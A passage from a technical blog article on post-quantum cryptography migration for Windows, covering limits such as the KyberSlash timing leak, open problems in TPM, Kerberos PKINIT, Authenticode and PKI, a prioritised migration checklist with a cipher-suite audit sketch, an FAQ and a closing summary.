&lt;p&gt;&lt;strong&gt;2. The side-channel surface is larger.&lt;/strong&gt; ML-DSA&apos;s rejection-sampling loop is secret-correlated; Falcon&apos;s Gaussian sampler requires floating-point arithmetic; ML-KEM&apos;s polynomial operations can leak through cache-timing channels. The most visceral example is &lt;strong&gt;KyberSlash&lt;/strong&gt; (eprint 2024/1049, advisory GHSA-x5j2-g63m-f8g4), in which Bernstein and collaborators demonstrated that the &lt;em&gt;official Kyber reference implementation&lt;/em&gt; contained a secret-dependent division-timing leak that survived multiple rounds of NIST review and recovered secret keys in minutes on a Raspberry Pi 2 [@kyberslash-2024].KyberSlash is the most important data point in PQC implementation security. The leak was a one-line &lt;code&gt;/&lt;/code&gt; operator that compiled to a variable-time integer division on ARM and on older x86-64. The vulnerability survived years of formal NIST review, multiple academic implementations, and several vendor ports. Constant-time discipline is more fragile in PQ primitives than in classical primitives -- both because the algorithms are newer and because the ring arithmetic offers many more variable-time corners than the simpler scalar arithmetic of ECDH or RSA. The KyberSlash site, authored by Bernstein, documents specific implementations affected [@kyberslash-2024].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. The signed-binary harvest is not closed by PQ.&lt;/strong&gt; This is the article&apos;s third aha moment, and the one most readers miss. A 2026 Authenticode signature on a 2026 Windows driver uses RSA-2048 + SHA-256. In 2035, the verifier may no longer trust RSA-2048 -- but the binary has already been loaded by every machine that downloaded it. Authenticode is not a transport channel. There is no migration-window analogue of harvest-now-decrypt-later because the signature was already validated at load time. The threat model is &quot;an adversary in 2035 forges a &lt;em&gt;new&lt;/em&gt; signature on a &lt;em&gt;new&lt;/em&gt; binary,&quot; not &quot;an adversary in 2035 decrypts a 2026 conversation.&quot; The two threat models call for different migration disciplines.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Post-quantum cryptography closes the harvest-now-decrypt-later channel for transport-protected traffic (TLS, IPsec, SSH, iMessage). It does not close the signed-binary persistence channel; a 2035 quantum-forged signature on a 2035 driver is a &lt;em&gt;new&lt;/em&gt; attack, not a retroactive decryption of a 2026 signature. It does not close the algorithm-agility gap; CNG ships per-algorithm identifiers, not per-algorithm-class. Plan migration accordingly. Hybrid TLS first; composite X.509 chain second; firmware signing pilot third. Authenticode and PKINIT can wait for Microsoft&apos;s published specifications -- and premature migration in those surfaces is &lt;em&gt;worse&lt;/em&gt; than no migration.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;4. The algorithm-agility problem persists.&lt;/strong&gt; Microsoft has shipped CNG identifiers &lt;em&gt;per algorithm&lt;/em&gt; (&lt;code&gt;BCRYPT_MLKEM_ALGORITHM&lt;/code&gt;, &lt;code&gt;BCRYPT_MLDSA_ALGORITHM&lt;/code&gt;) rather than per algorithm-class (a hypothetical &lt;code&gt;BCRYPT_PQ_KEM_ALGORITHM&lt;/code&gt; that selected the underlying primitive at runtime). The IETF treats algorithm agility as a load-bearing concern in &lt;code&gt;draft-ietf-pquip-pqc-engineers-14&lt;/code&gt; (26 August 2025), the IETF informational document on engineering PQC into existing protocol surfaces [@draft-pquip-engineers]. CNG does not yet treat it as load-bearing; the engineering consequences for the next migration are discussed in Section 9.4.&lt;/p&gt;

The property of a cryptographic protocol or library that lets the underlying algorithm change without changing the protocol or API surface. A protocol that names &quot;AES-256-GCM&quot; instead of &quot;an AEAD with at least 128-bit security&quot; has poor algorithm agility; replacing AES-256-GCM with ChaCha20-Poly1305 requires the entire protocol to be re-negotiated. CNG&apos;s `BCRYPT_MLKEM_ALGORITHM` is per-algorithm rather than per-algorithm-class; a future Round-5 KEM will require new CNG plumbing rather than a parameter change. The IETF `pqc-engineers` document treats algorithm agility as the load-bearing engineering concern for the post-2030 migration window [@draft-pquip-engineers].

A common confusion is the simultaneous truth that lattice cryptography has a *stronger* hardness argument than RSA (the worst-case-to-average-case reduction) and a *narrower* cryptanalytic margin (the 12% exponent gap). Both are true. The strength claim is structural: every average-case Module-LWE instance is hard if any worst-case lattice instance is hard. The narrowness claim is empirical: the best known algorithm is closer to a feasibility threshold than the best known algorithm for factoring or for elliptic-curve discrete log. The conservative McEliece line trades the strength claim (no analogous reduction) for an even wider empirical margin (no progress on Goppa-code decoding in 48 years). Engineers who treat &quot;stronger hardness&quot; and &quot;wider margin&quot; as synonyms get the post-quantum picture backwards. The honest framing: lattice is the deployable post-quantum, McEliece is the conservative fallback, and the portfolio exists because no one assumption carries everything.
&lt;p&gt;These four limits are not bugs; they are structural. But they are not the only open problems. What is the cryptographer&apos;s current research frontier, and where will the next migration begin?&lt;/p&gt;
&lt;h2&gt;9. Open Problems -- Where the Active Research Is&lt;/h2&gt;
&lt;p&gt;What does Microsoft, NIST, and the IETF still not know? Five open problems whose resolution will define the next decade of Windows cryptography.&lt;/p&gt;
&lt;h3&gt;9.1 TPM 2.0 and Pluton blob-size constraints&lt;/h3&gt;
&lt;p&gt;Default &lt;code&gt;MAX_COMMAND_SIZE&lt;/code&gt; and &lt;code&gt;MAX_RESPONSE_SIZE&lt;/code&gt; on TPM 2.0 are 4096 bytes. ML-DSA-87 signatures (4595 bytes) overflow the response buffer; ML-DSA-65 (3293 bytes) fits. NV memory budgets on commodity TPMs are tightly constrained, which means storing a single ML-DSA-87 keypair (2592-byte public key plus a multi-kilobyte private state) consumes a meaningful fraction of the available NV slot space [@wolfssl-wolftpm-v185, @fips-204-pdf]. The TCG TPM 2.0 Library Specification v1.85 (March 2026) introduces the streaming command family that resolves the buffer overflow; the cited wolfSSL secondary source enumerates the new commands verbatim as &lt;code&gt;TPM2_SignSequenceStart&lt;/code&gt; / &lt;code&gt;TPM2_VerifySequenceStart&lt;/code&gt;, &lt;code&gt;TPM2_SignSequenceComplete&lt;/code&gt; / &lt;code&gt;TPM2_VerifySequenceComplete&lt;/code&gt;, and &lt;code&gt;TPM2_SignDigest&lt;/code&gt; / &lt;code&gt;TPM2_VerifyDigestSignature&lt;/code&gt; for digest-mode operations, plus &lt;code&gt;TPM2_Encapsulate&lt;/code&gt; and &lt;code&gt;TPM2_Decapsulate&lt;/code&gt; for ML-KEM, with the new structures &lt;code&gt;TPM2B_KEM_CIPHERTEXT&lt;/code&gt;, &lt;code&gt;TPM2B_SHARED_SECRET&lt;/code&gt;, and &lt;code&gt;TPM_ST_MESSAGE_VERIFIED&lt;/code&gt; (the matching &lt;code&gt;*SequenceUpdate&lt;/code&gt; opcode is implied by analogy with the existing TPM 2.0 hash-sequence command family but is not enumerated in the available secondary source pending TCG primary access) [@wolfssl-wolftpm-v185]. Commodity v1.85-capable chips are entering early sampling in 2026; &lt;strong&gt;Pluton&apos;s Rust firmware can move faster&lt;/strong&gt; but is locked to specific SoC generations.Pluton&apos;s SoC-generation locking is the structural cost of its update-channel advantage. The Microsoft Learn Pluton page enumerates the currently supported families (AMD Ryzen 6000, 7000, 8000, 9000, and Ryzen AI Series; Intel Core Ultra 200V Series, Ultra Series 3, and (non-Ultra) Series 3 processors; Qualcomm Snapdragon 8cx Gen 3 and Snapdragon X Series) [@pluton-microsoft-learn]; OEMs without those silicon options cannot ship Pluton-backed PQC even when the firmware-update mechanism is ready. The cross-reference to the Pluton sibling article spells out the silicon-side mechanics.&lt;/p&gt;
&lt;h3&gt;9.2 Kerberos PKINIT&lt;/h3&gt;
&lt;p&gt;RFC 4556&apos;s certificate-of-the-KDC bootstrap currently uses RSA-OAEP or pre-shared-secret-via-ECDH for AS-REP key establishment. The KDC certificate could be composite-ML-DSA-signed, but the AS-REP encryption key derivation has no IETF post-quantum migration draft as of May 2026. Every Windows domain join, every smart-card logon, every Kerberos-authenticated SMB or RDP or IIS session depends on PKINIT -- and PKINIT has no PQ path. The NTLM-to-PKINIT migration (the subject of a sibling article on &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM deprecation&lt;/a&gt;) was hard enough; the PKINIT-to-PQ-PKINIT migration has not started.&lt;/p&gt;
&lt;h3&gt;9.3 Authenticode and the EFI signature database&lt;/h3&gt;
&lt;p&gt;A Windows machine that boots in 2035 must verify boot loaders signed between 2010 and 2035. The EFI signature-database revocation list (&lt;code&gt;dbx&lt;/code&gt;) is roughly 32 KB on commodity platforms [@uefi-dbx]. Replacing each entry&apos;s RSA-2048 signature with ML-DSA-65 multiplies the per-entry signature size by ~1.6×; with SLH-DSA-SHA2-128f, by ~50×. No public Microsoft &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt; post-quantum roadmap exists as of May 2026. LMS is the obvious candidate -- CNSA 2.0 mandates LMS or XMSS for firmware signing -- but the dbx-size question remains open. Cross-reference the Secure Boot sibling article in this series.&lt;/p&gt;
&lt;h3&gt;9.4 Algorithm agility as a separately engineered property&lt;/h3&gt;
&lt;p&gt;Section 8 limit-4 introduced algorithm agility as a structural property the IETF treats as load-bearing [@draft-pquip-engineers]. The open engineering problem is the CNG provider-interface design. Today every consumer -- Schannel, AD CS, IKEv2, SMB, RDP, Authenticode -- is wired to a specific algorithm identifier (&lt;code&gt;BCRYPT_MLKEM_ALGORITHM&lt;/code&gt;, &lt;code&gt;BCRYPT_MLDSA_ALGORITHM&lt;/code&gt;). A future migration to a NIST Round-5 KEM has to re-do every one of those wiring points, the same shape of problem CNG had with the RSA-to-ECDSA transition. Solving algorithm agility means redesigning the CNG provider interface around algorithm &lt;em&gt;families&lt;/em&gt; rather than algorithm &lt;em&gt;names&lt;/em&gt; -- a multi-year engineering programme that nobody has publicly committed to, and that the post-2030 migration window depends on.&lt;/p&gt;
&lt;h3&gt;9.5 The PKI rebuild before 2035&lt;/h3&gt;
&lt;p&gt;Every TLS server certificate, every code-signing certificate, every smart-card user certificate has to be re-issued in a post-quantum algorithm before the legacy algorithm is disallowed. The throughput of the global public-CA system is the limiting factor. Commercial CAs are pilot-issuing composite-signed roots in 2026; volume issuance lags by years. &lt;strong&gt;NIST IR 8547 (12 November 2024)&lt;/strong&gt; proposes deprecating quantum-vulnerable algorithms in NIST standards by 2035 [@nist-ir-8547].&lt;/p&gt;

NIST IR 8547 proposes the timeline; CNSA 2.0 imposes it on U.S. National Security Systems; CA/Browser Forum will eventually impose it on public web PKI. The unfunded part is the operational work. Every organisation operating an internal Windows AD CS hierarchy has to re-issue its root, its issuing CAs, and every end-entity certificate. The Microsoft tooling for this rebuild is the AD CS composite-signature support and the CertEnroll ML-DSA template path. The CA throughput question is real -- a typical commercial CA issues at peak in the low hundreds of thousands of certificates per day, and the global web PKI runs at orders of magnitude more -- which is why composite signatures are the deployment story for 2026-2030 and pure-PQ X.509 is the post-2030 story [@nist-ir-8547, @draft-lamps-composite].

flowchart TD
    OP1[&quot;TPM / Pluton blob-size limits (v1.85)&quot;]
    OP2[&quot;Kerberos PKINIT bootstrap&quot;]
    OP3[&quot;Authenticode and EFI dbx&quot;]
    OP4[&quot;CNG algorithm agility&quot;]
    OP5[&quot;Global PKI rebuild by 2035&quot;]
    OP1 --&amp;gt; S1[&quot;Hello attestation&quot;]
    OP1 --&amp;gt; S2[&quot;BitLocker network unlock&quot;]
    OP1 --&amp;gt; S3[&quot;Trustlet attestation&quot;]
    OP2 --&amp;gt; S4[&quot;Domain join&quot;]
    OP2 --&amp;gt; S5[&quot;Smart-card logon&quot;]
    OP2 --&amp;gt; S6[&quot;Kerberos-mediated SMB / RDP / IIS&quot;]
    OP3 --&amp;gt; S7[&quot;Driver loading&quot;]
    OP3 --&amp;gt; S8[&quot;Secure Boot revocation&quot;]
    OP4 --&amp;gt; S9[&quot;Schannel / AD CS / IKEv2 / SMB / RDP&quot;]
    OP5 --&amp;gt; S10[&quot;Every X.509 certificate in the estate&quot;]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; ML-DSA-87 keys cannot live on a TPM 2.0 chip whose firmware predates Library Specification v1.85. Three Windows surfaces are stuck on RSA-2048 / ECDSA-P256 until v1.85-capable chips reach retail volume: Windows Hello attestation (TPM-bound), BitLocker network unlock (depends on TPM key sealing), and &lt;a href=&quot;https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Trustlet attestation&lt;/a&gt; (LSAISO / Credential Guard). Pluton can move faster than discrete TPMs because its firmware ships through Windows Update; the cross-reference to the Pluton sibling article explains the firmware-update agility mechanism [@wolfssl-wolftpm-v185, @ms-quantum-safe-blog].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Five open problems, five decade-scale research programmes, five places where a Windows engineer&apos;s procurement decision in 2026 will be visible in 2035. So what does that engineer do on Monday morning?&lt;/p&gt;
&lt;h2&gt;10. Practical Guide -- What an Engineer Does Monday Morning&lt;/h2&gt;
&lt;p&gt;Six actions, in priority order. Each is doable in May 2026. Each closes a real gap. None requires a procurement cycle -- those start at Action 4.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Run a CNG inventory against &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Cryptography&lt;/code&gt; and the registered providers. Catalogue certificate templates with &lt;code&gt;certutil -template&lt;/code&gt;. Enumerate Schannel cipher suites with &lt;code&gt;Get-TlsCipherSuite&lt;/code&gt; on every Schannel-using service. Identify every place RSA-2048, ECDSA-P256, ECDH/X25519, RSA-PSS, and DSA appear in your estate. Output is a CSV. The CSV is the input to every subsequent action. Without inventory, the migration is a guessing game [@cng-algorithm-ids].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;{`
// Pseudo-code for a Schannel cipher-suite inventory.
// In real PowerShell: Get-TlsCipherSuite | Select-Object Name, Hash, Cipher, Exchange
// This logic flags quantum-vulnerable Exchange groups (RSA, ECDH-*-without-PQ-companion).
type CipherSuite = {
  name: string;
  exchange: string;   // &quot;ECDHE&quot;, &quot;DHE&quot;, &quot;RSA&quot;, &quot;X25519MLKEM768&quot;, ...
  cipher: string;     // &quot;AES-256-GCM&quot;, &quot;ChaCha20-Poly1305&quot;, ...
  hash: string;       // &quot;SHA-384&quot;, &quot;SHA-256&quot;, ...
};&lt;/p&gt;
&lt;p&gt;const QUANTUM_VULNERABLE_EXCHANGE = new Set([
  &quot;RSA&quot;, &quot;DHE&quot;, &quot;ECDHE&quot;, &quot;ECDH&quot;,                // classical key agreement
  &quot;X25519&quot;, &quot;SecP256r1&quot;, &quot;SecP384r1&quot;,            // unwrapped classical EC groups
]);&lt;/p&gt;
&lt;p&gt;const QUANTUM_SAFE_EXCHANGE = new Set([
  &quot;X25519MLKEM768&quot;, &quot;SecP256r1MLKEM768&quot;, &quot;SecP384r1MLKEM1024&quot;,
  &quot;MLKEM768&quot;, &quot;MLKEM1024&quot;,
]);&lt;/p&gt;
&lt;p&gt;function audit(suites: CipherSuite[]) {
  for (const s of suites) {
    if (QUANTUM_SAFE_EXCHANGE.has(s.exchange)) {
      console.log(&quot;OK    &quot; + s.name + &quot;  (&quot; + s.exchange + &quot;)&quot;);
    } else if (QUANTUM_VULNERABLE_EXCHANGE.has(s.exchange)) {
      console.log(&quot;FLAG  &quot; + s.name + &quot;  (&quot; + s.exchange + &quot; is harvest-now-decrypt-later exposed)&quot;);
    } else {
      console.log(&quot;?     &quot; + s.name + &quot;  (unknown exchange &quot; + s.exchange + &quot;)&quot;);
    }
  }
}
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Cloudflare-fronted endpoints already negotiate &lt;code&gt;X25519MLKEM768&lt;/code&gt; by default [@cloudflare-pq-for-all, @cloudflare-pq-2024]. For Windows servers using OpenSSL 3.5+, enable hybrid. For Schannel-only servers, monitor the Group Policy toggle on 24H2 and the documented Schannel curve preference order. Hybrid is the immediate harvest-now-decrypt-later defence -- the one place where a single configuration change measurably reduces today&apos;s exposure to a future quantum break.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Issue one composite root, one composite issuing CA, one composite end-entity certificate in a non-production lab. Validate consumption by an updated Schannel client and Microsoft Edge. The point is to surface the operational rough edges -- template definition, key-archival behaviour with PQ keys, certificate-validation timing on uplevel and downlevel clients -- before they hit production. This is the load-bearing 2026-2030 PKI migration on-ramp; the composite OID is downlevel-compatible, so the failure mode of an uplevel client validating an unaltered classical chain is the baseline, not a regression [@draft-lamps-composite].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Current TPM 2.0 v1.84 chips on most Windows 11 endpoints will not accept ML-DSA-87 keys without a firmware update. Use &lt;code&gt;Get-Tpm&lt;/code&gt; and the TBS API to enumerate supported algorithms; if &lt;code&gt;BCryptOpenAlgorithmProvider&lt;/code&gt; for ML-DSA returns &lt;code&gt;NTE_NOT_SUPPORTED&lt;/code&gt; against the platform crypto provider, the underlying TPM does not yet expose the PQ surface. If your hardware lifetime extends past 2030, wait for v1.85-capable chips (early sampling 2026) or Pluton (already shipping with on-die firmware updates). Inventory your fleet&apos;s TPM firmware versions today; the migration plan needs to know the floor [@wolfssl-wolftpm-v185].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; UEFI capsule signing, OEM driver signing, and secure-boot dbx revocation entries are all candidates for LMS or XMSS [@cnsa20-csa]. The stateful-counter requirement is acceptable because build pipelines already track build numbers monotonically. The CNG identifier &lt;code&gt;BCRYPT_LMS_ALGORITHM&lt;/code&gt; is prerelease; SymCrypt v103.6.0 ships LMS [@symcrypt-changelog]. Start the pilot in a non-production signing service that has secure HSM custody of the counter state. The firmware-signing migration is the only place where CNSA 2.0 explicitly &lt;em&gt;prefers&lt;/em&gt; stateful hash-based signatures over ML-DSA, because firmware signing is the use case where state discipline is realistic.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Post-quantum Authenticode is not specified by Microsoft as of May 2026. Premature migration breaks downlevel verification. The discipline is: hybrid TLS first, composite X.509 chain second, AD CS pilot third, firmware-signing pilot fourth, and &lt;strong&gt;leave Authenticode alone&lt;/strong&gt; until Microsoft publishes the post-quantum Authenticode specification. Authenticode signatures are validated at binary load time; harvest-now-decrypt-later does not apply, and there is no urgency that justifies risking downlevel-verifier breakage. This is the action that takes restraint rather than effort.&lt;/p&gt;
&lt;/blockquote&gt;

The priority ordering follows the threat model. Hybrid TLS is first because it closes harvest-now-decrypt-later on transport traffic with no compatibility cost (the classical share remains in the handshake; an uplevel server downgrades to classical-only cleanly). Composite X.509 is second because it lets you build a post-quantum-ready PKI hierarchy now and surfaces operational rough edges before pure-PQ deployments. Firmware signing is third because the stateful-counter discipline requires HSM-mediated key custody and a long lead time for the signing pipeline. Authenticode is last because there is no specification and no urgency.
&lt;p&gt;One quarter to inventory, two quarters to pilot, two years to volume. Now for the questions every engineer asks after reading.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions and Closing&lt;/h2&gt;


Yes, when the server supports `X25519MLKEM768` and your Edge build negotiates it. Check via the Edge devtools&apos; Security panel, or test against a Cloudflare-fronted endpoint with the Edge URL bar&apos;s connection information popup. Cloudflare reported nearly two percent of all TLS 1.3 connections to its edge were post-quantum-protected in March 2024, with a forecast of double-digit adoption by year-end [@cloudflare-pq-2024]. Endpoints that have not enabled hybrid TLS still negotiate X25519 alone, which leaves you exposed to harvest-now-decrypt-later.

Not as of May 2026. Schannel&apos;s hybrid TLS 1.3 preview is gated behind Group Policy on 24H2 and Server 2025. Microsoft&apos;s Quantum-Safe Security blog frames May 2026 to November 2026 as the milestone window for default-on negotiation [@ms-quantum-safe-blog]. Until then, the Schannel side has to be explicitly opted in via the cipher-preference order and the Group Policy toggle.

No, not on the public record. Post-quantum Authenticode is not yet specified. The CNG `BCRYPT_MLDSA_ALGORITHM` exists, and SymCrypt 103.7.0 implements ML-DSA, but the Authenticode signature format and the verifier policy have not been updated to accept post-quantum algorithms. Premature migration breaks downlevel verification on every Windows machine that has not received the PQ Authenticode update -- which today is *every* Windows machine. Do not migrate Authenticode prematurely.

Only against harvest-now-decrypt-later. Today&apos;s TLS is not under quantum attack -- quantum computers capable of breaking RSA-2048 or ECDH-X25519 do not exist in 2026. But today&apos;s TLS *traffic can be recorded* today, and if a sufficient quantum computer exists in 2040 the recorded traffic can be decrypted then. Enabling hybrid TLS now closes that window; enabling it in 2035 does not retroactively protect the traffic recorded in 2026 [@mosca-2015].

Nobody knows. CNSA 2.0 picks 2035 as the policy deadline, not a technical forecast [@cnsa20-csa]. Mosca&apos;s 2015 estimate, widely reproduced in PQC literature, was a 1/2 chance of breaking RSA-2048 by 2031. Quantum-engineering progress between 2015 and 2026 has been substantial on the qubit-count axis and modest on the error-correction axis; the underlying question -- when a thousand-logical-qubit fault-tolerant device becomes available -- has no consensus answer in 2026. CNSA 2.0&apos;s job is to make the answer not matter.

Hybrid `X25519MLKEM768` protects you against a break of either component. The HKDF combiner in `draft-ietf-tls-hybrid-design-16` requires both component shared secrets to be uniform-looking from the adversary&apos;s perspective; an attacker who breaks only ML-KEM still cannot recover the session key without also breaking X25519 [@draft-tls-hybrid]. Pure ML-KEM (no hybrid) does not have this property. The central design choice of the IETF hybrid construction is that it pays the byte cost (~1.2 KB extra per handshake) to buy the safety margin.

The kilobyte scale is structural to lattice mathematics; it is not a parameter-tuning issue. The minimum key size for a Module-LWE-based KEM at NIST category 3 is set by the dimension required for security under the best known lattice-sieving attacks. ML-KEM-768 at 1184 bytes is already aggressively tuned [@wp-kyber]. The alternatives that offer smaller keys (Falcon at 897 bytes, SIKE-when-it-was-alive at ~330 bytes) buy that size with either constant-time difficulty (Falcon&apos;s Gaussian sampler) or fragility (SIKE collapsed in July 2022). Classical comparisons: X25519&apos;s 32-byte public value is the floor; Classic McEliece&apos;s ~1 MB is the ceiling.

Only if your procurement timeline extends past 2030. As of May 2026, TPM 2.0 v1.85-PQ-spec-compliant chips are in announcement and early-sampling stages, not in retail volume [@wolfssl-wolftpm-v185]. Pluton is shipping, but is locked to specific SoC generations (current Intel Core Ultra series, AMD Ryzen 8000-series, Qualcomm Snapdragon X) [@pluton-microsoft-learn]. If you replace endpoints every three years, your 2026 procurement decision will be visible in 2029, before any post-quantum TPM mandate bites. If your refresh cycle is five-to-seven years, the calculus changes -- but the answer is still &quot;wait for v1.85 silicon to ship at volume&quot; unless you can write a specific business case for the early-adopter risk.

&lt;h3&gt;Closing&lt;/h3&gt;
&lt;p&gt;A Windows endpoint opens a connection to &lt;code&gt;cloudflare.com&lt;/code&gt;. The 1184-byte field on the wire is no longer a curiosity. It is a thirty-year migration in a single TLS extension. The bytes have a history: Diffie and Hellman in 1976; Shor in 1994; McEliece&apos;s megabyte keys; HFE and its descendants broken by Beullens; NTRU patented for two decades; Regev&apos;s quantum-reduction LWE in 2005; the Ring-LWE compression of 2010; the Module-LWE knob of 2012; BCNS 2014 from Microsoft Research Redmond; Cloudflare-by-default on October 3, 2022; the Castryck-Decru break twenty-five days after NIST&apos;s July 2022 selection; SymCrypt 103.5.0; the FIPS publications of August 13, 2024; the CNG &lt;code&gt;BCRYPT_MLKEM_ALG_HANDLE&lt;/code&gt; exposed in Insider Canary in May 2025; Schannel preview behind Group Policy in early 2026.&lt;/p&gt;
&lt;p&gt;The work is not done. Kerberos PKINIT has no PQ path. Authenticode has no PQ specification. BitLocker network unlock is still RSA-2048. The EFI signature database is still RSA-2048. Every signed binary already on every Windows disk in the world is signed with an algorithm whose 2035 status is uncertain. The TPM 4096-byte buffer cannot fit an ML-DSA-87 signature. CNG ships per-algorithm identifiers, not per-algorithm-class, which guarantees that the &lt;em&gt;next&lt;/em&gt; migration will hit the same surfaces from the same angle. CNSA 2.0 picks 2035; NIST IR 8547 picks 2035 [@cnsa20-csa, @nist-ir-8547]; the global public-CA infrastructure has nine years to rebuild every certificate it has ever issued.&lt;/p&gt;

Migration to post quantum cryptography (PQC) is not a flip-the-switch moment, it&apos;s a multiyear transformation that requires immediate planning and coordinated execution to avoid a last-minute scramble. -- Microsoft Quantum-Safe Security blog, 20 August 2025 [@ms-quantum-safe-blog].

The cryptographic transition described here runs in parallel to the architectural transition documented across this blog&apos;s sibling articles. The hypervisor article explains the substrate on which the Secure Kernel and trustlets sit. The VBS trustlets article explains where Credential Guard lives. The NTLM-to-Kerberos article documents the protocol migration that PQ Kerberos PKINIT will eventually re-do. The Adminless article addresses the local-administrator surface; the Pluton and TPM articles cover the silicon-side roots of trust; the Secure Boot article covers the static measured boot chain that meets the dynamic measured boot chain at hypervisor load. Read them in any order. They share the same migration calendar, the same engineering discipline, and the same honesty about the gaps.
&lt;p&gt;Above all, the bytes are real. The CNG handle exists. The SymCrypt release is shipping. The migration has started. The next decade is the engineering. Every line of code, every parameter set, every byte of that 1184-byte field has thirty years of work behind it, and the Windows engineer of 2026 is the one who carries it the next mile.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;post-quantum-cryptography-on-windows&quot; keyTerms={[
  { term: &quot;ML-KEM (FIPS 203)&quot;, definition: &quot;Module-Lattice-Based Key-Encapsulation Mechanism. The only NIST-finalised post-quantum KEM. Parameter sets ML-KEM-512/768/1024 over R_q = Z_q[X]/(X^256 + 1) with q = 3329. ML-KEM-768 public key is 1184 bytes, ciphertext 1088 bytes, shared secret 32 bytes.&quot; },
  { term: &quot;ML-DSA (FIPS 204)&quot;, definition: &quot;Module-Lattice-Based Digital Signature Algorithm. Fiat-Shamir-with-aborts over Module-LWE / Module-SIS, q = 8380417. Parameter sets ML-DSA-44/65/87; signatures 2420 / 3293 / 4595 bytes.&quot; },
  { term: &quot;SLH-DSA (FIPS 205)&quot;, definition: &quot;Stateless Hash-Based Digital Signature Algorithm. SPHINCS+ lineage; security rests on hash-function security alone. Twelve parameter sets across SHA-2 and SHAKE; signatures 7,856 to 49,856 bytes.&quot; },
  { term: &quot;LWE / Ring-LWE / Module-LWE&quot;, definition: &quot;Learning With Errors: distinguish (A, As + e) from uniform when e is small. Ring-LWE lifts to a polynomial ring; Module-LWE generalises to module-rank-k. The 2010-2012 algebraic lift compressed lattice key sizes from megabytes to kilobytes.&quot; },
  { term: &quot;NTT&quot;, definition: &quot;Number Theoretic Transform. The finite-field analogue of the FFT; reduces polynomial multiplication in R_q from O(n^2) to O(n log n). The reason ML-KEM is fast enough for TLS.&quot; },
  { term: &quot;Fujisaki-Okamoto-Hofheinz transform&quot;, definition: &quot;Generic IND-CPA-to-IND-CCA2 transform for KEMs. Re-encrypts the plaintext during decapsulation and returns implicit-rejection pseudorandom output on mismatch. ML-KEM wraps K-PKE with FO to become IND-CCA2.&quot; },
  { term: &quot;Mosca&apos;s inequality&quot;, definition: &quot;X + Y &amp;gt; Z. If data-secrecy lifetime plus migration time exceeds time-to-quantum-computer, harvest-now-decrypt-later succeeds. The framing that made post-quantum migration an actionable IT-policy lever.&quot; },
  { term: &quot;CNSA 2.0&quot;, definition: &quot;U.S. NSA Commercial National Security Algorithm Suite 2.0. Mandates ML-KEM-1024, ML-DSA-87, LMS/XMSS for firmware, AES-256, and SHA-384 in National Security Systems. Acquisition preference 2027; mandatory adoption 2031; RSA / ECDSA disallowed after 2035.&quot; },
  { term: &quot;Hybrid key agreement&quot;, definition: &quot;Combines a classical key-agreement primitive (X25519) with a post-quantum KEM (ML-KEM-768) so the session key depends on both. An adversary must break both components to forge or recover. Used by Cloudflare since October 2022, Apple iMessage PQ3 since February 2024, Schannel preview in 2026.&quot; },
  { term: &quot;Composite signature&quot;, definition: &quot;X.509 signature that combines a classical and a post-quantum component such that both must verify. The deployment story for 2026-2030 X.509 PKI migration, per draft-ietf-lamps-pq-composite-sigs-19. Downlevel verifiers ignore the composite OID; uplevel verifiers validate both.&quot; },
  { term: &quot;Algorithm agility&quot;, definition: &quot;The property that protocols and APIs can change the underlying algorithm without re-engineering the consumer. CNG ships per-algorithm identifiers (BCRYPT_MLKEM_ALGORITHM) rather than per-algorithm-class identifiers; a future Round-5 KEM will require new CNG plumbing.&quot; },
  { term: &quot;X25519MLKEM768&quot;, definition: &quot;Hybrid TLS 1.3 Supported Group, codepoint 0x11EC, defined in draft-ietf-tls-ecdhe-mlkem-04. Concatenates X25519 (32-byte) and ML-KEM-768 (1184-byte ek / 1088-byte ct) shares. ClientHello key_share is 1216 bytes; ServerHello key_share is 1120 bytes.&quot; }
]} questions={[
  { q: &quot;Why is the post-quantum programme a public-key replacement programme and not a symmetric one?&quot;, a: &quot;Shor&apos;s algorithm breaks RSA / DH / ECDSA / ECDH in polynomial time on a fault-tolerant quantum computer, with no parameter increase rescuing them. Grover&apos;s algorithm gives only a quadratic speedup on symmetric primitives, which is absorbed by doubling key sizes (AES-256, SHA-384). The asymmetric lane is fatal; the symmetric lane is a parameter bump.&quot; },
  { q: &quot;What single algebraic move compressed lattice public keys from megabytes to kilobytes?&quot;, a: &quot;Lifting Learning With Errors from Z_q to a polynomial ring R_q = Z_q[X]/(X^n + 1), per Lyubashevsky-Peikert-Regev 2010. Polynomial multiplication via NTT becomes O(n log n) instead of O(n^2). Module-LWE (Langlois-Stehle 2012/2015) added a module-rank parameter knob that lets one base ring serve every NIST security category.&quot; },
